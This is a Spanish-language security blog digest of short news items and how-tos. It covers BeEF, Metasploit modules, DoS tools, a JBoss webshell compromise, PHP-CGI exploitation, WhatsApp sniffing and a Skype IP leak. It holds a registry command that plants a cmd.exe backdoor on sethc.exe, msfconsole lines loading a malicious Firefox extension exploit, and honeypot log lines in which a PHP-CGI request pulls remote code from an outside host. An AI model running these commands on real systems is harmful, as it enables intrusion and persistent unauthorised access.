BeEF Framework: Para mi, la carne muy hecha

Seguramente alguna película te ha hecho plantearte llegar a ser hacker, el éxito, el dinero y las mujeres que conlleva el ser experto en informática –por cierto, esto es mentira. Sí, todo ello-. Lo que sí es una realidad es que, si cometes un delito, podrías ser encarcelado –en algunos blogs comentan que esto permite hacer nuevos amigos, con tatuajes molones y muchas ganas de buena compañía–.

Vale, no lo estoy vendiendo precisamente de una forma bonita, pero ¿qué me dirías si te ofrezco ser un hacker de verdad durante toda 1h? Y si desde hace algún tiempo estas pudiendo ser uno, sin ni quiera darte cuenta, simplemente dando vueltas por Internet. ¿A que esto da miedito?

Estoy hablando de BeEF, una utilidad que, si no recuerdo mal, vi en una presentación en la RootedCon hace algún tiempo, un Framework relativamente fácil de instalar, con un montón de utilidades para ser malo, ganar dinero y, por supuesto, que te permita luego hacer buenos amigos en la cárcel, pero que cuenta con una implicación inconsciente por parte de personas anónimas, que sólo están navegando.

Un día dando vueltas por Internet, te notifican que has estado participando en ataques contra… no sé, el pentágono, -que siempre impresiona más a las chicas-. Lo curioso es que ni tienes los conocimientos para realizar ningún ataque, ni mucho menos, intención de ponerte a piratear nada. ¿Qué ha ocurrido?

El viejo truco de las sticky keys sigue funcionado

El "exploit" de las sticky keys sigue sin parchearse y funciona incluso en Windows 7, Windows 8 Consumer Preview y Windows Server 2008 R2.


A pesar de que el truco se conoce desde hace ya bastante tiempo, Microsoft todavía sigue sin parchear este agujero de seguridad. Además explotarlo es bastante fácil, cualquiera puede hacerlo sólo sustituyendo el ejecutable sethc.exe (o utilman.exe) por cmd.exe. Para ello necesitaremos permisos sobre la ruta ‘c:\Windows\System32' o arrancar el sistema con un Live CD, aunque existe una opción aún mejor con la que obtendríamos los mismos resultados, simplemente introduciendo unas pocas líneas en la consola (recordar que necesitaremos que el usuario tenga permisos de admin):

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Cómo comprometer un equipo mediante una extensión de Firefox falsa (xpi)

La siguiente técnica recuerda a la de los applet falsos de java y su funcionamiento es similar: mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit firefox_xpi_bootstrapped_addon, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:



msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

Yahoo! expone su clave privada dentro de la extensión Axis para Chrome

Yahoo! acaba de anunciar su nuevo navegador Axis implementado como una extensión para Chrome, Firefox e Internet Explorer y no lo han estrenado precisamente bien: han dejado la clave privada para firmar la extensión dentro del propio paquete de la extensión de Chrome.

El australiano Nik Cubrilovic explicaba en su blog que al revisar el código encontró el fichero .pem, el certificado que usa Yahoo! para firmar su extensión y para que Chrome pueda comprobar su autenticidad.

El resultado es que con la clave privada cualquier atacante podría crear una extensión para Chrome y el navegador "confiaría" en ella creyendo que proviene de Yahoo!.

Para demostrar además la vulnerabilidad, Nik ha creado una extensión de prueba con una alerta en javascript firmada con este certificado privado. El código lo podéis encontrar en un repositorio en GitHub. Si lo probáis, veréis que al pinchar el enlace la extensión se instalará directamente en Chrome.

Imaginaros una extensión falsa que capture el tráfico web (incluidas las contraseñas) y que, por ejemplo, se instalara en los usuarios al falsificar la entrada DNS de la URL de actualización...

Proyecto Genoma de Malware para Android

Los investigadores de seguridad en dispositivos móviles reclaman un esfuerzo global para compartir datos sobre malware dirigido a la plataforma Android con el objetivo de mejorar la capacidad de defenderse contra estos ataques.

El Proyecto Genoma de Malware para Android ha sido creado por Yajin Zhou y Xuxian Jiang, investigadores de la North Carolina State, y ya ha recogido más de 1.200 piezas de malware. El proyecto está diseñado para compartir todo el código relacionado con el malware en Android con el objetivo de facilitar la investigación de seguridad. Jiang y su equipo han sido los primeros en identificar docenas de aplicaciones de malware, incluyendo DroidKungFu y GingerMaster.

Jiang anunció el proyecto el 22 de mayo en el Simposio IEEE sobre Seguridad y Privacidad en San Francisco.

El proyecto es importante, dice Jiang, ya que "nuestra capacidad de defensa está muy restringida por la limitada comprensión del malware móvil
emergente y la oportuna falta de acceso a muestras relacionadas. Nuestra comunidad de investigación tiene que hacer un mejor trabajo para el intercambio de datos, si queremos desarrollar a tiempo la próxima generación de soluciones de seguridad móvil."

Comprometidas multitud de cuentas de Diablo 3

Al parecer Blizzard ha sido objeto de un importante ataque que dio como resultado el robo de cuentas de Diablo 3 (o items de cuentas) durante los días 19 y 20 de mayo. Probablemente este ataque fue la razón de que muchos servidores europeos fueran cerrados durante unas cuatro horas.

Muchos jugadores se han quejado de la falta de información en el foro de Battle.net oficial, donde circulan rumores acerca de inyecciones SQL, secuestro de sesiones e incluso phising. Parece que los usuarios que registraron actividad con otros jugadores como “leyiong”, “Nevin”, “SBJunkie”, “luckllezz (George Melchers)”, “McLeast” o incluso otros desconocidos podrían haber sido comprometidos.

Para todos Blizzard recomienda visitar cambiar la contraseña y usar el autenticador. No obstante algunos jugadores que usan el autenticador también han sido hackeados, por lo que cobra fuerza que los atacantes han podido explotar una vulnerabilidad en el lado del servidor. Estaremos atentos a más noticias :)

No me rastreen, gracias: Do Not Track (DNT)

Como muchos sabréis Do Not Track (DNT) es una iniciativa para permitir a los usuarios decidir si quieren ser o no rastreados en Internet. Fue impulsada por Mozilla (guía de campo), apoyada por la Federación de Comercio estadounidense y gracias al consorcio W3C se convertirá en estándar web en octubre de este año. Ya ha sido apoyada por Google, Opera, Microsoft y recientemente ha sido también incluida en Twitter.

Y si crees que el rastreo en Internet no es importante o es poca cosa, te invitamos a probar la extensión de Firefox Collusion. Con ella podrás crear un mapa interactivo a partir del sitio que estés visitando, mostrando en tiempo real las páginas que utilizan cookies de terceros para rastrear tu actividad y cómo éstas interaccionan con las principales compañías de seguimiento, compartiendo la información de todos tus movimientos.

Así que, si quieres activarlo en tu navegador para mantener la privacidad en sitios que permitan DNT, sólo tendrás que seguir unos sencillos pasos:

Ataques DoS efectivos mediante colisiones de hashes

Durante la conferencia 28c3 (28th Chaos Communication Congress) de finales del año pasado en Berlín, Alexander “alech” Klink y Julian “zeri” Wälde ofrecieron una interesante charla titulada "Ataques de denegación de servicio eficientes sobre plataformas de aplicaciones web". En ella hablan de ataques basados en colisiones de hashes que causan fácilmente pérdidas de servicio en un gran porcentaje de aplicaciones web.

Pero, ¿en qué consisten estos ataques?. Muchas aplicaciones web automáticamente recogen los parámetros de cada petición y los pegan en un hash de pares de claves para aumentar el rendimiento y la velocidad. La idea es "colisionar" estos hashes mediante peticiones http post para que el servidor objetivo consuma una gran cantidad de CPU al procesarlos.

Si un atacante es capaz de entender los valores usados en el algoritmo de hashing puede pre-calcular un conjunto de valores de hashes que den como resultado el mismo. Comparar estos hashes se convierte en una función cuadrática que puede crear una carga muy pesada en el servidor web.

Por ejemplo, enviar aproximadamente dos megabytes de valores que computan el mismo hash provoca que el servidor tenga que comparar más de 40 billones de strings. Wow!

HULK, una herramienta DoS para servidores web

La mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por lo tanto, permiten mitigar sus efectos.

HULK (Http Unbearable Load King) es una sencilla herramienta DoS escrita en Python cuyo principal objetivo es generar peticiones únicas para evitar/evadir motores de caché e incidir directamente en la carga del servidor. Las principales técnicas que utiliza son las siguientes:

- Ofuscación del origen: cada petición del cliente se envía con un agente de usuario distinto seleccionado aleatoriamente de una lista.

- Falsificación de referencias: el referer que incluye la petición está ofuscado y apunta hacia el mismo servidor objetivo u otros sitios web conocidos.

- Adhesión: utiliza comandos estándar HTTP para tratar de hacer que el servidor mantenga las conexiones abiertas mediante el uso de Keep-Alive con una ventana de tiempo variable.

- no-cache: se solicita al servidor HTTP no-cache para obtener una página única.

- Transformación de URL única: para evitar la caché y otras herramientas de optimización, se utilizan nombres de parámetros y valores aleatoriamente en cada petición, lo que hace que cada petición sea única y que el servidor tenga que procesarla en cada caso.

Hacking de sistemas CCTV con Metasploit

Un nuevo módulo para el Framework de Metasploit, cctv_dvr_login, descubre y pone a prueba la seguridad de los sistemas de vídeo vigilancia de los circuitos cerrados de televisión (CCTV). Estos sistemas suelen utilizarse en pequeñas tiendas, comunidades de vecinos, residencias personales y entornos empresariales como parte de su programa de seguridad física. Sin embargo, muchos de estos sistemas son vulnerables y pueden permitir a un atacante obtener acceso remoto. Este acceso remoto, activado por defecto, puede permitir no sólo la posibilidad de ver vídeo en tiempo real, si no también el control de las cámaras (si es compatible) y facilitar el acceso a imágenes de archivo.

La mayoría de los propietarios de los sistemas de vigilancia de vídeo de CCTV pueden incluso no ser conscientes de las capacidades de su dispositivo, algunos de los cuales pueden estar expuestos a Internet, ya sea intencionalmente o por accidente.

En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:

ClubHACK Magazine nº28

Se ha publicado el número 28 (mayo 2012) de Clubhack Magazine. Este mes, la revista india incluye artículos que tratan asuntos tan interesantes como la esteganografía en covert channels, la herramienta Kautilya que facilita el uso de USB HID como Teensy++, el protocolo HTTPS, el robo de identidad y algunas pequeñas medidas para evitar la inyección en nuestro código.

Índice:
0x01 - Steganography over converted channels (Tech Gyan)
0x02 - Kauntilya (Tool Gyan)
0x03 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Gide)
0x04 - Section 66C - Punishment for identity theft (Legal Gyan)
0x05 - Don’t Get Injected – Fix Your Code (Code Gyan)

La versión PDF puede descargarse desde: http://chmag.in/issue/may2012.pdf

La 9ª de Anonymous compromete los sitios web de Capio Sanidad

La 9ª compañía ha publicado un mensaje informando que han tomado "el control de TODA su identidad online: Capio Sanidad, Capio Enfermería y, aun más grave, las webs de los Hospitales que gestiona, incluyendo citas online, analíticas, etc.".
 
El grupo de Anonymous lleva a cabo esta acción contra la privatización de la sanidad pública y particularmente en represalia contra Capio Sanidad, que se llevará próximamente los hospitales públicos de Castilla La Mancha y Valencia. 
 
Si observamos con detalle el vídeo, vemos que la web utilizaba un servidor de aplicaciones Jboss desactualizado (4.2.3 GA) y la consola JMX era accesible publicamente (www.capiosanidad.es/jmx-console/).

La "demo" muestra como era posible apagar remotamente el servidor de aplicaciones, pero áun más interesante son las URLs que demuestran que se ha conseguido desplegar un webshell (/zecmd/zecmd.jsp).

Probablemente esto se consiguió a través del mbean DeploymentFileRepository y aprovechando la vulnerabilidad CVE-2010-0738: la consola sólo aplica restricciones de seguridad para peticiones GET y POST, obviando otros métodos como HEAD.

Exposicion de info sensible en routers Netgear WNDRMAC

Nathaniel Carew de Sense of Security Labs ha reportado una vulnerabilidad en el router NETGEAR Wireless Extreme (WNDRMAC) N600, el cual muestra información sensible en el código fuente de su interfaz web. Concretamente, si se ha configurado la recuperación de contraseña, un atacante podría obtener las respuestas de las preguntas de seguridad y loggearse en el dispositivo.

Inicialmente, si fallamos al introducir el login del administrador, observamos si está activada la recuperación:


Y simplemente, en el cgi correspondiente, podemos ver las preguntas y las respuestas con las que podremos acceder al router con las credenciales de administración:


Por el momento se recomienda desactivar la opción de recuperación de contraseñas.

Libro: Mobile Malware Attacks and Defense

El malware ha dado el salto a la movilidad y el panorama de la seguridad está cambiando rápidamente con ataques emergentes a teléfonos inteligentes, PDAs y otros dispositivos móviles. Este libro trata esta amenaza y cubre una amplia gama de malware dirigido a sistemas operativos como Symbian y a nuevos dispositivos como el iPhone.
Aprende a analizar vulnerabilidades y exploits de plataformas y dispositivos móviles y a mitigar estas amenazas para proteger tus datos bancarios, subastas y otras actividades realizadas en tu smartphone.

* Visual Payloads
View attacks as visible to the end user, including notation of variants.

* Timeline of Mobile Hoaxes and Threats
Understand the history of major attacks and horizon for emerging threates.

* Overview of Mobile Malware Families
Identify and understand groups of mobile malicious code and their variations.

* Taxonomy of Mobile Malware
Bring order to known samples based on infection, distribution, and payload strategies.

Guía para securizar tu equipo y navegar de forma anónima

La siguiente guía publicada en MasterPirate y redifundida por CyberGuerrilla detalla cómo fortificar nuestro sistema y prepararlo para navegar de forma anónima. 

Incluye instrucciones precisas y sencillas y es válida incluso para los más noobs. Recomendado:

=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:
  1.   Obtaining Tor Browser
  2.   Using and Testing Tor Browser for the first time
  3.   Securing Your Hard Drive
  4.   Setting up TrueCrypt, Encrypted Hidden Volumes
  5.   Testing TrueCrypt Volumes
  6.   Securing your Hard Disk
  7.   Temporarily Securing Your Disk, Shredding Free Space
  8.   Installing VirtualBox
  9.   Installing a Firewall
  10.   Firewall Configuration
  11.   Installing Ubuntu
  12.   Ubuntu Initial Setup
  13.   Installing Guest Additions
  14.   Installing IRC (Optional)
  15.   Installing Torchat (Optional)
  16.   Creating TOR-Only Internet Environment
  17.   General Daily Usage
Descarga la versión pdf securesurf.pdf

Un superhéroe muy entrañable

Regresa el superhéroe más adorable de todos, que se enamora a una rapidez vertiginosa, no puede ser otro que ¡Cálico Electrónico!

De la mano de informática64, vuelve uno de los personajes que más nos han podido hacer reír con sus aventuras, y los cacharros de “electronicaweb”. Con unas rimas que parecen sacadas de los mejores poemas de Rafael Alberti.

Han aprovechado y ahora disponen de todos los capítulos anteriores en lo que ellos denominan: “HD a ful”, que viene siendo un paso antes del 3D. Posiblemente contenga trazas de “oloroscopio”.


Así que desde aquí, sólo nos queda disfrutar el primer episodio de la 4ª temporada, que sin duda nos dejará un buen sabor de boca. Y a esperar ansiosos al siguiente.

Filtro ModSecurity para la vulnerabilidad de PHP-CGI

Como muchos ya sabréis, el grupo de seguridad Eindbazen descubrió en el CTF de la última Nullcon y publicó recientemente una vulnerabilidad de ejecución remota de código en PHP-CGI (CVE-2012-1823, CVE-2012-2311, ...). 

En resumen un atacante remoto puede ser capaz de pasar argumentos de línea de comandos en una query string (‘?-s’), que se transferirá directamente al programa PHP-CGI...

Pues bien, SpiderLabs confirma que este ataque ya se está explotando activamente y, prueba de ello, son los intentos de explotación recogidos por sus honeypots:

37.112.127.136 - - [07/May/2012:02:36:11 +0400] "GET /?-s+%3d HTTP/1.1" 200 38 "-" "-"
37.112.127.136 - - [07/May/2012:02:36:12 +0400] "GET /?-d+auto_prepend_file=http://r00texp.narod2.ru/ows.txt HTTP/1.1" 200 38 "-" "-"
91.210.189.171 - - [07/May/2012:04:46:12 +0400] "GET /?-s HTTP/1.0" 200 6085 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
94.242.199.77 - - [07/May/2012:05:01:17 +0400] "GET /?-s HTTP/1.0" 200 6085 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
37.112.127.136 - - [07/May/2012:12:08:01 +0400] "GET /?-d+auto_prepend_file=http://r00texp.narod2.ru/ows.txt HTTP/1.0" 200 753 "-" "-"
37.112.127.136 - - [07/May/2012:12:08:01 +0400] "GET /?-s+%3d HTTP/1.0" 200 753 "-" "-"
Fijaros que mientras que algunos de estos intentos son simplemente pruebas para ver si la aplicación es vulnerable, también hay dos intentos de RFI para ejecutar código PHP.

Llegan “The Unknowns” para mejorar la seguridad en Internet

We are The Unknowns; Our Knowledge Talsk and Wisdom Listens...

Un nuevo grupo de hackers que se hace llamar “The Unknowns” ha irrumpido con fuerza vulnerando la seguridad de grandes sitios como los de la Agencia Glenn de Investigación de la NASA, la ESA, el Ejército de los EE.UU., la Fuerza Aérea de EE.UU., la Marina Real de Tailandia, la Universidad de Harvard, Renault, las páginas amarillas en Jordania, el Ministerio de Defensa en Bahrein y el Ministerio francés de Defensa.

Empezaron publicando en Pastebin una amplia lista de nombres, contraseñas, documentos e incluso capturas de pantalla de las webs comprometidas y afirman que su objetivo es exponer la inseguridad en Internet para que las organizaciones mejoren su seguridad, simplemente, sin ninguna connotación política o interés económico. No obstante os traducimos su mensaje para que sepáis más acerca de este grupo del que, estamos seguros, pronto volveremos a tener noticias...


"Somos un nuevo grupo de hackers, nunca hemos estado en ningún grupo de hacking antes. No somos la versión 2 de Anonymous y no estamos en contra del gobierno de EE.UU. 

WhatsAppSniffer: captura fácilmente conversaciones de WhatsApp

WhatsAppSniffer de DecibelioApps es una herramienta para terminales Android rooteados con Busybox que permite capturar y leer conversaciones de WhatsApp en una red WiFi. Esto incluye texto, fotos, vídeos e incluso coordenadas.


Creada para demostrar la inseguridad de las comunicaciones de WhatsApp, simplemente utiliza TCPDump para capturar los paquetes de la red WiFi filtrando como origen o destino los servidores de WhatsApp.

A pesar de que todos los mensajes capturados están en texto plano, sin necesidad de descifrar nada y se cumplen los términos legales definidos por WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ") el APK ya ha sido retirado del market Google Play.Aunque es fácil descargar la aplicación desde cualquier mirror...

Para redes cifradas WPA/WPA2 utiliza de forma opcional ARPSpoof y hay una versión gratuita que permite grabar hasta tres conversaciones.

PlayThru, sustituye los tradicionales captchas por mini-juegos

Muchas veces los captchas llegan a ser molestos porque son imposibles de descifrar hasta por un humano. La iniciativa de Are You a Human ha desarrollado PlayThru, una alternativa a la autenticación basada en texto que, en lugar de pedir al usuario que escriba una palabra borrosa o distorsionada, le propone un mini-juego tal como arrastrar un coche a una plaza libre de aparcamiento, añadir ingredientes a una pizza, cazar mariposas, etc...



Este método es más seguro que los captchas tradicionales por palabra ya que los bots automáticos tienen más dificultades para resolver estos rompecabezas basados en imágenes y, sin duda, más divertido para los usuarios.

PlayThru ha estado en beta desde hace varios meses y actualmente está disponible de forma gratuita gratuita. Puede incrementar hasta un 40% las peticiones de los usuarios en un formulario, soporta HTML5 y Flash y ya está disponible para Wordpress, Drupal, PhpBB, Android, iPhone, etc.

Puedes ver una demo aquí: http://www.areyouahuman.com/demo

Los hackers más peligrosos del mundo

terra - Los nombres de los hackers más avezados y peligrosos del mundo son revelados en el libro “El lado oscuro de internet. La mafia del ciberespacio”, del periodista inglés Misha Glenny.

Glenny, además de desvelar la identidad de los hombres que actúan al margen de la ley informática, cuenta las apasionantes historias de estos personajes que sorprendieron al mundo por su impresionante capacidad para manejar redes y desafiar las reglas.  

Tras dos años de investigación y más de 200 horas de entrevistas, el autor consiguió datos claves para construir su relato. Entre las historias destaca la de Renukanth Subramaniam, alias JiLsi, quien se sumergió en el mundo del delito informático y terminó preso al ser declarado culpable de clonar tarjetas de crédito y de otros cargos de fraude hipotecario.

En julio de 2012, JiLsi quedará en libertad por buena conducta pero existe aún una orden preventiva que le impedirá usar una computadora sin supervisión durante los cinco años siguientes a su salida de la cárcel.

Los nombres reales y alias de otros hackers famosos son Adewale Taiwo (Freddybb), Dimitri Golubov, Roman Vega, Maksim Kovalchuk (Blade), Detlef Hartmann (Matrix001), RedBrigade, Max Vision (Max Butler o Iceman), Nicholas Joehle (Dron), Hakim B (Lord Kaisersose), Cha0, Mert Ortaç (SLayraCkEr) y Lord Cyric.

Vulnerabilidad en Skype permite obtener la IP de cualquier usuario

Ayer se publicó en Pastebin (¡eso sí es jugársela!) la manera de obtener la dirección IP de cualquier usuario de Skype, simplemente activando el debug y viendo el log generado al visualizar la información de un usuario, sin ni siquiera añadirlo como contacto.

Para ello se utiliza una versión modificada de Skype, concretamente la 5.5 des-ofuscada por Vilko, que explica que esta versión es un híbrido de un interfaz gráfico en Delphi y una dll embebida con el "kernel" de Skype, y que ese kernel compilado con VC posee una estructura independiente que permite exportar su código binario con la cabecera dll.

Esta versión fue publicada en la página del proyecto Skype-open-source, un proyecto que ahora está suspendido tras la demanda de Microsoft :(

No obstante, todavía pueden encontrarse las instrucciones en Internet así que ¡vamos a probarlo!

1. Descargamos e instalamos la versión modificada de Skype 5.5:
http://skype-open-source.blogspot.com/2012/03/skype55-deobfuscated-released.html (<- retirado por M$, busca tú mirror!)